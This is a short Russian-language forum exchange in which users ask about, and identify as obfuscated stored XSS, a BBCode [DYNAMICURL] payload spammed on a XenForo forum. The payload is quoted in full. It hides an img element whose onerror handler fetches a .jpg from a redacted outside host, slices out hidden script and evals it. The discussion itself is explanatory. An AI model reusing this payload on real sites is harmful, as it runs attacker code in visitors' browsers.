это stored XSS же, в чистом виде, "канонический", с некоторой обфускацией (классическая "склейка") чтоб не палился.На одном из форум XenForo увидел много сообщений с таким содержание
Что это?Код:[DYNAMICURL='" style=position:absolute;opacity:0><img src=//k onerror="fetch(`htt`+`ps://**********/kalita.jpg`).then(x=>x.text()).then(x=>eval(x.slice(70048)))']k[/DYNAMICURL]
а зачем ссылку попрятал? ведь ужасть как интересно чо там за скриптик фетчится (слайсится из jpg картинки, прикольно) то в случае успеха атаки...